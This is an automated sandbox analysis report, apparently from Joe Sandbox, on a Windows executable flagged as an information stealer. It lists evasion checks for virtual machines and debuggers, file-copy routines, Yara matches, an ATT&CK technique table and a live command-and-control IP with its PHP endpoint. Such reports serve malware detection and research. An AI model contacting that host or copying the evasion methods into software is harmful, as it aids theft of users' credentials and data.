                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26177
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeEvaded block: after key decisiongraph_0-27338
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeAPI coverage: 6.5 %
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_047EE077
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_047EDCE7
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_047EC0D7
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_047E1937
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_047EF917
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_047F4107
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_047EE697
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_047F4B77
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_047F3B17
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_047F47D7
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_047EEF87
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: Amcache.hve.3.drBinary or memory string: VMware
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002BE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                      Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002BE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareT9
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQ
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002BE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeAPI call chain: ExitProcess graph end nodegraph_0-26165
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeAPI call chain: ExitProcess graph end nodegraph_0-26162
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeAPI call chain: ExitProcess graph end nodegraph_0-26003
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeAPI call chain: ExitProcess graph end nodegraph_0-26205
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeAPI call chain: ExitProcess graph end nodegraph_0-27529
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeAPI call chain: ExitProcess graph end nodegraph_0-26184
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeAPI call chain: ExitProcess graph end nodegraph_0-26176
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeAPI call chain: ExitProcess graph end nodegraph_0-26050
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_02BB9F83 push dword ptr fs:[00000030h]0_2_02BB9F83
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047E092B mov eax, dword ptr fs:[00000030h]0_2_047E092B
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047F99B7 mov eax, dword ptr fs:[00000030h]0_2_047F99B7
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047E0D90 mov eax, dword ptr fs:[00000030h]0_2_047E0D90
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047FD151 SetUnhandledExceptionFilter,0_2_047FD151
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047FB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_047FB5A1
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047FAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_047FAFAF
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: nGmqbXROga.exe PID: 7312, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_047F9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_047F9867
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_047F7DF7
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\nGmqbXROga.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.3.nGmqbXROga.exe.4830000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nGmqbXROga.exe.47e0e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.nGmqbXROga.exe.4830000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nGmqbXROga.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nGmqbXROga.exe.47e0e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nGmqbXROga.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1884509350.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1704751466.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: nGmqbXROga.exe PID: 7312, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.3.nGmqbXROga.exe.4830000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nGmqbXROga.exe.47e0e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.nGmqbXROga.exe.4830000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nGmqbXROga.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nGmqbXROga.exe.47e0e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nGmqbXROga.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1884509350.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1704751466.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: nGmqbXROga.exe PID: 7312, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote ServicesData from Local System1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory31
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection
                      NTDS11
                      Process Discovery
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Account Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      System Owner/User Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSync1
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc Filesystem123
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      nGmqbXROga.exe37%ReversingLabs
                      nGmqbXROga.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://194.15.46.65/7f031eb0d257b290.phptrue
                        unknown
                        http://194.15.46.65/true
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://194.15.46.65nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002BE3000.00000004.00000020.00020000.00000000.sdmp, nGmqbXROga.exe, 00000000.00000002.1884426333.0000000002BAE000.00000004.00000020.00020000.00000000.sdmp, nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmptrue
                            unknown
                            http://194.15.46.65/7f031eb0d257b290.phponGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://194.15.46.65/7f031eb0d257b290.php2nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://upx.sf.netAmcache.hve.3.drfalse
                                • URL Reputation: safe
                                unknown
                                http://194.15.46.65DanGmqbXROga.exe, 00000000.00000002.1884426333.0000000002BAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://194.15.46.65/7f031eb0d257b290.php:=nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://194.15.46.65/7f031eb0d257b290.phpj=nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://194.15.46.65/6XFZnGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://194.15.46.65/7f031eb0d257b290.phpv=nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://194.15.46.65/75nGmqbXROga.exe, 00000000.00000002.1884509350.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            194.15.46.65
                                            unknownunknown
                                            20952VENUS-INTERNET-ASGBtrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1543218
